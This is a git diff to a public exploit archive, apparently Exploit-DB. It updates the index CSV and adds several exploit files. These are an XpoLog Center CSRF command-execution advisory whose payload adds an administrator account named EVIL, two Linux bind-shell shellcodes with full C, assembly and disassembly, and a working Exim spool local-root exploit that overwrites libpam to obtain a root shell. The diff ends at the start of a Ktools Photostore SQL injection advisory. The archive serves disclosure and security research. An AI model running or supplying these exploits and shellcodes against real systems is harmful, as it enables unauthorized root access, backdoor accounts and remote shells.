diff --git a/files.csv b/files.csv
index 38b69cee7..7c4090a46 100755
--- a/files.csv
+++ b/files.csv
@@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
-38076,platforms/php/webapps/38076.txt,"BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
+38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting Vulnerability",2012-12-01,eidelweiss,php,webapps,0
@@ -35763,7 +35763,7 @@ id,file,description,date,author,platform,type,port
39541,platforms/linux/dos/39541.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39543,platforms/linux/dos/39543.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39544,platforms/linux/dos/39544.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
-39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
+39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro <= 10.5.7.32 & Nitro Reader <= 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80
39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent XSS",2016-03-10,"Mohammad Khaleghi",php,webapps,80
@@ -36161,6 +36161,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
+40054,platforms/linux/local/40054.c,"Debian Exim - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@@ -36220,4 +36221,11 @@ id,file,description,date,author,platform,type,port
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
-40049,platforms/linux/local/40049.c,"Ubuntu 16.04 local root exploit - netfilter target_offset OOB",2016-07-03,vnik,linux,local,0
+40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
+40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303
+40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
+40052,platforms/lin_x86-64/shellcode/40052.c,"Linux 64bit NetCat Bind Shell Shellcode - 64 bytes",2016-07-04,CripSlick,lin_x86-64,shellcode,0
+40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80
+40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
+40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
+40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
diff --git a/platforms/jsp/webapps/40050.txt b/platforms/jsp/webapps/40050.txt
new file mode 100755
index 000000000..35cc14261
--- /dev/null
+++ b/platforms/jsp/webapps/40050.txt
@@ -0,0 +1,98 @@
+
+XpoLog Center V6 CSRF Remote Command Execution
+
+
+Vendor: XpoLog LTD
+Product web page: http://www.xpolog.com
+Affected version: 6.4469
+ 6.4254
+ 6.4252
+ 6.4250
+ 6.4237
+ 6.4235
+ 5.4018
+
+Summary: Applications Log Analysis and Management Platform.
+
+Desc: XpoLog suffers from arbitrary command execution. Attackers
+can exploit this issue using the task tool feature and adding a
+command with respected arguments to given binary for execution.
+In combination with the CSRF an attacker can execute system commands
+with SYSTEM privileges.
+
+Tested on: Apache-Coyote/1.1
+ Microsoft Windows Server 2012
+ Microsoft Windows 7 Professional SP1 EN 64bit
+ Java/1.7.0_45
+ Java/1.8.0.91
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5335
+Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
+
+
+14.06.2016
+
+--
+
+
+exePath = "C:\\windows\\system32\\cmd.exe"
+exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
+
+
+
+
+
+
+
+--
+
+exePath = "C:\\windows\\system32\\cmd.exe"
+exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
+
+
+GET
+http://10.0.0.17:30303/logeye/testingus.txt
+
+Response:
+
+nt authority\system
diff --git a/platforms/lin_x86-64/shellcode/40052.c b/platforms/lin_x86-64/shellcode/40052.c
new file mode 100755
index 000000000..aeed81992
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40052.c
@@ -0,0 +1,40 @@
+#include
+#include
+
+// Exploit Title: [NetCat Bind Shell 64bit 64byte]
+// Date: [6/28/2016]
+// Exploit Author: [CripSlick]
+// Tested on: [Kali 2.0]
+// Version: [v1.10-41]
+
+// ShepherdDowling@gmail.com
+// OffSec ID: OS-20614
+
+// Victim: netstat -an | grep LISTEN | grep tcp
+// Attacker: nc
+
+unsigned char code[] = \
+
+#define PORT "\x39\x39"
+// Keep to two bytes
+
+"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+;
+
+int main ()
+{
+ // I make sure there are no nulls
+ // The string count will terminate at the first \x00
+ printf("The Shellcode is %d Bytes Long\n", strlen(code));
+
+ // Next I throw 0xAAAAAAAA into every register before shellcode execution
+ // This ensures that the shellcode will run in any circumstance
+
+ __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
+ "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
+ "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
+ "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
+ "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
+ "call code");
+ return 0;
+}
diff --git a/platforms/lin_x86/shellcode/40056.c b/platforms/lin_x86/shellcode/40056.c
new file mode 100755
index 000000000..57922794d
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40056.c
@@ -0,0 +1,265 @@
+/*
+# Linux x86 TCP Bind Shell Port 4444 (98 bytes)
+# Author: sajith
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 98
+# SLAE - 750
+
+------------c prog ---poc by sajith shetty----------
+#include
+#include
+#include
+#include
+#include
+
+int main(void)
+{
+
+int sock_file_des, clientfd;
+struct sockaddr_in sock_ad;
+//[1]we need to create the socket connection using socket call function
+
+//[*]Man page for socket call
+//----->int socket(int domain, int type, int protocol);
+// domain = AF_INET (IPv4 Internet protocol family which will be used for communication)
+// type = SOCK_STREAM (Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmission mechanism may be supported
+// protocol = 0 (The protocol specifies a particular protocol to be used with the socket.Normally only a single protocol exists to support a particular socket type within a given protocol family, in which case protocol can be specified as 0.
+
+sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
+//[2]Binds the socket to localhost and port (here will use 4444) using bind call.
+
+//[*]Man page for bind call
+//------->int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
+// sockfd = sock_file_des
+// const struct sockaddr *addr = (struct sockaddr *)&sock_ad (bind() assigns the address specified to by addr to the socket referred to by the file descriptor sockfd)
+// socklen_t addrlen = sizeof(sock_ad) (addrlen specifies the size, in bytes, of the address structure pointed to by addr.)
+
+sock_ad.sin_family = AF_INET; // Host byte order.(2)
+sock_ad.sin_port = htons(4444);// network byte order
+sock_ad.sin_addr.s_addr = INADDR_ANY;//(0)bindshell will listen on any address
+
+bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad));
+
+
+//[3]Waits for incoming connection using call to listen
+
+//[*]Man page for listen call
+//------->int listen(int sockfd, int backlog);
+// sockfd = sock_file_des (The sockfd argument is a file descriptor that refers to a socket of type SOCK_STREAM)
+// backlog = 0 (The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow)
+
+
+listen(sock_file_des, 0);
+
+//[4]Accept the connection using call to accept
+
+//[*]Man page to accept call
+//------->int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+// sockfd = sock_file_des
+// struct sockaddr *addr = NULL (The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer.When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.
+// socklen_t *addrlen = NULL
+
+
+clientfd = accept(sock_file_des, NULL, NULL);
+
+//[5]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
+
+//[*]Man page for dup2 (duplicate a file descriptor)
+//------->int dup2(int oldfd, int newfd);
+// oldfd = clientfd
+// newfd = 0(stdin) , 1(stdout), 2(stderr)
+dup2(clientfd, 0); // stdin
+dup2(clientfd, 1); // stdout
+dup2(clientfd, 2); // stderr
+
+//[6]Execute shell (here we use /bin/sh) using execve call
+
+//[*]Man page for execve call
+//------->int execve(const char *filename, char *const argv[],char *const envp[]);
+// char *filename = /bin/sh
+// char *const argv[] = NULL
+// char *const envp[] = NULL
+
+execve("/bin/sh",NULL,NULL);
+}
+----------------------end of c program--------------
+
+global _start
+
+section .text
+
+_start:
+
+;syscall for socket
+;cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket
+;#define __NR_socketcall 102 (0x66 in hex)
+;sock_file_des = socket(AF_INET, SOCK_STREAM, 0)
+;AF_INET = 2 ( bits/socket.h)
+;SOCK_STREAM = 1 (bits/socket.h)
+;socket(2,1,0)
+xor eax, eax ; zero out eax register using XOR operation
+xor ebx, ebx ; zero out ebx register using XOR operation
+push eax ; move 0 to stack (protocol=0)
+mov al, 0x66 ; moves socket call number to al register
+mov bl, 0x1 ; moves 0x1 to bl register
+push ebx ; value in ebx=1 is pushed in to the stack (sock_stream =1)
+push 0x2 ; value 0x2 is pushed onto stack (AF_INET=2)
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80 ; socket()
+mov esi, eax ; store sockfd in esi register
+
+;sock_ad.sin_addr.s_addr = INADDR_ANY;//0, bindshell will listen on any address
+;sock_ad.sin_port = htons(4444);// port to bind.(4444)
+;sock_ad.sin_family = AF_INET; // TCP protocol (2).
+xor edx, edx ; zero out edx register using XOR operation
+push edx ; push 0 on to stack (INADDR_ANY)
+push word 0x5C11; htons(4444)
+push word 0x2 ; AF_INET = 2
+mov ecx, esp ; save the pointer to args in ecx
+
+;bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad));
+;cat /usr/include/linux/net.h | grep bind
+;bind = 2
+
+mov al, 0x66 ; sys socket call
+mov bl, 0x2 ; bind =2
+push 0x10 ; size of sock_ad (sizeof(sock_ad))
+push ecx ; struct pointer
+push esi ; push sockfd (sock_file_des) onto stack
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80
+
+
+;listen(sock_file_des, 0);
+;cat /usr/include/linux/net.h | grep listen
+; listen =4
+
+mov al, 0x66 ; sys socket call
+mov bl, 0x4 ; listen=4
+push edx ; push 0 onto stack (backlog=0)
+push esi ; sockfd (sock_file_des )
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80
+
+;clientfd = accept(sock_file_des, NULL, NULL)
+;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+;cat /usr/include/linux/net.h | grep accept
+; accept=5
+
+mov al, 0x66 ; sys socket call
+mov bl, 0x5 ; accept =5
+push edx ; null value socklen_t *addrlen
+push edx ; null value sockaddr *addr
+push esi ; sockfd (sock_file_des )
+mov ecx, esp ; save the pointer to args in ecx
+int 0x80
+
+;int dup2(int oldfd, int newfd);
+;dup2(clientfd, 0); // stdin
+;dup2(clientfd, 1); // stdout
+;dup2(clientfd, 2); // stderr
+
+mov ebx, eax ;move client fd to ebx
+xor ecx, ecx ; xor to clear out ecx
+mov cl, 3 ; counter to loop 3 times
+
+loopinghere:
+
+mov al, 0x3f ; sys call for dup2
+int 0x80
+dec cl ; decrement till 0
+jns loopinghere ; loop as long sign flag is not set
+
+;Execute shell (here we use /bin/sh) using execve call
+;execve("//bin/sh",["//bin/sh"])
+
+mov al, 11 ; execve
+ push edx ; push null
+ push 0x68732f6e ; hs/b
+ push 0x69622f2f ; ib//
+ mov ebx,esp ; save pointer
+ push edx ; push null
+ push ebx ; push pointer
+ mov ecx,esp ; save pointer
+ int 0x80
+-------------obj dump------------
+finalcode: file format elf32-i386
+
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 31 c0 xor eax,eax
+ 8048062: 31 db xor ebx,ebx
+ 8048064: 50 push eax
+ 8048065: b0 66 mov al,0x66
+ 8048067: b3 01 mov bl,0x1
+ 8048069: 53 push ebx
+ 804806a: 6a 02 push 0x2
+ 804806c: 89 e1 mov ecx,esp
+ 804806e: cd 80 int 0x80
+ 8048070: 89 c6 mov esi,eax
+ 8048072: 31 d2 xor edx,edx
+ 8048074: 52 push edx
+ 8048075: 66 68 11 5c pushw 0x5c11
+ 8048079: 66 6a 02 pushw 0x2
+ 804807c: 89 e1 mov ecx,esp
+ 804807e: b0 66 mov al,0x66
+ 8048080: b3 02 mov bl,0x2
+ 8048082: 6a 10 push 0x10
+ 8048084: 51 push ecx
+ 8048085: 56 push esi
+ 8048086: 89 e1 mov ecx,esp
+ 8048088: cd 80 int 0x80
+ 804808a: b0 66 mov al,0x66
+ 804808c: b3 04 mov bl,0x4
+ 804808e: 52 push edx
+ 804808f: 56 push esi
+ 8048090: 89 e1 mov ecx,esp
+ 8048092: cd 80 int 0x80
+ 8048094: b0 66 mov al,0x66
+ 8048096: b3 05 mov bl,0x5
+ 8048098: 52 push edx
+ 8048099: 52 push edx
+ 804809a: 56 push esi
+ 804809b: 89 e1 mov ecx,esp
+ 804809d: cd 80 int 0x80
+ 804809f: 89 c3 mov ebx,eax
+ 80480a1: 31 c9 xor ecx,ecx
+ 80480a3: b1 03 mov cl,0x3
+
+080480a5 :
+ 80480a5: b0 3f mov al,0x3f
+ 80480a7: cd 80 int 0x80
+ 80480a9: fe c9 dec cl
+ 80480ab: 79 f8 jns 80480a5
+ 80480ad: b0 0b mov al,0xb
+ 80480af: 52 push edx
+ 80480b0: 68 6e 2f 73 68 push 0x68732f6e
+ 80480b5: 68 2f 2f 62 69 push 0x69622f2f
+ 80480ba: 89 e3 mov ebx,esp
+ 80480bc: 52 push edx
+ 80480bd: 53 push ebx
+ 80480be: 89 e1 mov ecx,esp
+ 80480c0: cd 80 int 0x80
+
+-----------------------------------------------
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+
+"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68"
+"\x11\x5c" // port number 4444
+"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
+
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}
\ No newline at end of file
diff --git a/platforms/linux/local/40054.c b/platforms/linux/local/40054.c
new file mode 100755
index 000000000..ec9b5622a
--- /dev/null
+++ b/platforms/linux/local/40054.c
@@ -0,0 +1,280 @@
+/*
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Hello List,
+
+This is just a minor issue in Exim, no replies so far, so publication
+should be OK.
+
+Introduction:
+============
+Exim4 in some variants is started as root but switches to uid/gid
+Debian-exim/Debian-exim. But as Exim might need to store received
+messages in user mailboxes, it has to have the ability to regain
+privileges. This is also true when Exim is started as "sendmail".
+During internal operation, sendmail (Exim) will manipulate message
+spool files in directory structures owned by user "Debian-exim"
+without caring about symlink attacks. Thus execution of code as
+user "Debian-exim" can be used to gain root privileges by invoking
+"sendmail" as user "Debian-exim".
+
+
+POC:
+===
+http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
+demonstrates the issue using a ELF file being both executable
+and shared library which is invoked multiple times by different
+processes.
+
+
+Results, Discussion:
+===================
+As Exim4 process itself is already quite privileged - it has to
+access the user mailboxes with different UIDs anyway - the having
+such problems is expectable and explainable. A change in documentation
+might make sense, to indicate, that the special user "Debian-exim"
+is only intended to mark files being used by the daemon, but not
+to provide root/daemon user privilege separation.
+
+Even without this vulnerability, a "Debian-exim" process could
+use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
+to escalate to "adm" group, which again makes it very likely to
+use "syslog", "apache" or other components to escalate to root
+via "/var/log". This is annoying, perhaps this should get a CVE
+to make daemon-to-root escalations harder in general.
+
+
+Timeline:
+========
+20160605: Discovery, report Debian security
+20160607: Writeup
+20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
+20160630: Publication
+
+
+References:
+==========
+* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
+* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
+* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
+-----BEGIN PGP SIGNATURE-----
+
+iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj
+8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H
+=4IJk
+-----END PGP SIGNATURE-----
+
+ * This software is provided by the copyright owner "as is" and any
+ * expressed or implied warranties, including, but not limited to,
+ * the implied warranties of merchantability and fitness for a particular
+ * purpose are disclaimed. In no event shall the copyright owner be
+ * liable for any direct, indirect, incidential, special, exemplary or
+ * consequential damages, including, but not limited to, procurement
+ * of substitute goods or services, loss of use, data or profits or
+ * business interruption, however caused and on any theory of liability,
+ * whether in contract, strict liability, or tort, including negligence
+ * or otherwise, arising in any way out of the use of this software,
+ * even if advised of the possibility of such damage.
+ *
+ * Copyright (c) 2016 halfdog
+ * See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
+ * for more information.
+ *
+ * Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
+ * Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade"
+#define UPGRADE_LIB_DIR "/var/spool/exim4"
+
+#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1"
+
+extern char **environ;
+
+#if defined(__x86_64__)
+const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
+#define init_args(argc, argv) __asm__ volatile ( \
+ "mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
+ :"=m"(argc), "=r"(argv)::"memory")
+#endif /* __x86_64__ */
+
+
+/** Library initialization function, called by the linker. If not
+ * named _init, parameter has to be set during linking using -init=name
+ */
+extern void _libInit() {
+ if(geteuid()!=0) return;
+ int result=chown(UPGRADE_FILE_NAME, 0, 0);
+ assert(!result);
+ result=chmod(UPGRADE_FILE_NAME, 04755);
+ assert(!result);
+ exit(0);
+}
+
+extern void _entry (void) {
+ int argc=0;
+ char **argv = NULL;
+ init_args(argc, argv);
+ int result=main(argc, argv);
+ exit(result);
+}
+
+extern void pam_start() {}
+extern void pam_set_item() {}
+extern void pam_chauthtok() {}
+extern void pam_end() {}
+extern void pam_strerror() {}
+extern void pam_getenvlist() {}
+extern void pam_open_session() {}
+extern void pam_close_session() {}
+extern void pam_get_item() {}
+extern void pam_acct_mgmt() {}
+extern void pam_setcred() {}
+extern void pam_authenticate() {}
+
+
+int main(int argc, char **argv) {
+ DIR *dirStruct;
+ struct dirent *dirEnt;
+ char linkPath[1024];
+ int result;
+
+ assert(argc>1);
+ if(!strcmp(argv[1], "--Exec")) {
+ setresgid(0, 0, 0);
+ setresuid(0, 0, 0);
+ execve(argv[2], argv+2, environ);
+ fprintf(stderr, "Exec failed\n");
+ return(1);
+ }
+
+ if(!strcmp(argv[1], "--Repair")) {
+ int targetFd=open(TARGET_PATH, O_RDWR);
+ assert(targetFd>=0);
+ result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
+ assert(!result);
+ chmod(TARGET_PATH, atoi(argv[4]));
+ return(0);
+ }
+
+ if(!strcmp(argv[1], "--Upgrade")) {
+ struct stat origStatData;
+ stat(TARGET_PATH, &origStatData);
+
+ char *execArgs[6];
+ int childPid=fork();
+ if(!childPid) {
+ int inputFd=open("/dev/null", O_RDONLY);
+ dup2(inputFd, 0);
+ execArgs[0]="/usr/sbin/sendmail";
+ execArgs[1]="root@localhost";
+ execArgs[2]=NULL;
+ result=execve(execArgs[0], execArgs, environ);
+ assert(!result);
+ return(0);
+ }
+
+ strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
+ dirStruct=opendir("/var/spool/exim4/msglog");
+ assert(dirStruct);
+ result=1;
+ while(result) {
+ while((dirEnt=readdir(dirStruct))) {
+ if(*dirEnt->d_name=='.') continue;
+// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
+ strncpy(linkPath+23, dirEnt->d_name, 16);
+ result=symlink(TARGET_PATH, linkPath);
+ assert(!result);
+ fprintf(stderr, "Relinked %s\n", linkPath);
+ break;
+ }
+ rewinddir(dirStruct);
+ }
+ closedir(dirStruct);
+ while(1) {
+ struct stat currentStatData;
+ stat(TARGET_PATH, ¤tStatData);
+ if(currentStatData.st_uid!=origStatData.st_uid) break;
+ sleep(1);
+ }
+ waitpid(childPid, NULL, 0);
+
+ fprintf(stderr, "Target ready for writing\n");
+ int targetFd=open(TARGET_PATH, O_RDWR);
+ assert(targetFd>=0);
+ char *origData=(char*)malloc(origStatData.st_size);
+ result=read(targetFd, origData, origStatData.st_size);
+ assert(result==origStatData.st_size);
+
+ struct stat newStatData;
+ stat(UPGRADE_FILE_NAME, &newStatData);
+ char *newData=(char*)malloc(newStatData.st_size);
+ int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
+ result=read(selfFd, newData, newStatData.st_size);
+ assert(result==newStatData.st_size);
+ close(selfFd);
+
+ ftruncate(targetFd, 0);
+ lseek(targetFd, 0, SEEK_SET);
+ result=write(targetFd, newData, newStatData.st_size);
+ assert(result==newStatData.st_size);
+ fsync(targetFd);
+
+ childPid=fork();
+ if(!childPid) {
+ execArgs[0]="/bin/su";
+ execArgs[1]=NULL;
+ result=execve(execArgs[0], execArgs, environ);
+ assert(!result);
+ return(0);
+ }
+ waitpid(childPid, NULL, 0);
+
+ ftruncate(targetFd, 0);
+ lseek(targetFd, 0, SEEK_SET);
+ result=write(targetFd, origData, origStatData.st_size);
+ close(targetFd);
+
+ childPid=fork();
+ if(!childPid) {
+ char numbers[128];
+ char *ptr=numbers;
+ execArgs[0]=UPGRADE_FILE_NAME;
+ execArgs[1]="--Repair";
+ result=sprintf(ptr, "%d", origStatData.st_uid);
+ execArgs[2]=ptr; ptr+=result+1;
+ result=sprintf(ptr, "%d", origStatData.st_gid);
+ execArgs[3]=ptr; ptr+=result+1;
+ result=sprintf(ptr, "%d", origStatData.st_mode);
+ execArgs[4]=ptr;
+ execArgs[5]=NULL;
+ result=execve(execArgs[0], execArgs, environ);
+ assert(!result);
+ return(0);
+ }
+ waitpid(childPid, NULL, 0);
+
+ execArgs[0]=UPGRADE_FILE_NAME;
+ execArgs[1]="--Exec";
+ execArgs[2]="/bin/bash";
+ execArgs[3]="-c";
+ execArgs[4]="id; exec $0";
+ execArgs[5]=NULL;
+ execve(execArgs[0], execArgs, environ);
+ return(1);
+ }
+ fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
+ return(1);
+}
diff --git a/platforms/php/webapps/40051.txt b/platforms/php/webapps/40051.txt
new file mode 100755
index 000000000..5d19192b9
--- /dev/null
+++ b/platforms/php/webapps/40051.txt
@@ -0,0 +1,99 @@
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
+# Bug discovered by Yakir Wizman
+# Date 01/07/2016
+# Affected versions prior to 4.7.5
+# Vendor Homepage - http://www.ktools.net
+
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# Author will be not responsible for any damage.
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# About the Application:
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:
+#
+# Sell various sizes or formats of the same photo.
+# Sell photos, vector art, zip files and more.
+# Sell videos PhotoStore Pro Only
+# Sell prints, artwork, products, packages, digital collections and more.
+# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
+# Email notifications to both you and the customer upon purchase.
+# Customers can instantly download after payment.
+# Customers can instantly download their files after payment.
+# Connects to PayPal and 2Checkout.
+# Built in credit system to allow your customers to buy credits.
+# Allow your members to upload and sell their photos and other media while you take a commission.
+
+# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.
+# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.
+# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).
+
+
+
+# SQL Injection (error based) Proof-Of-Concept
+#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
+# SQL Injection (Severity is Critical)
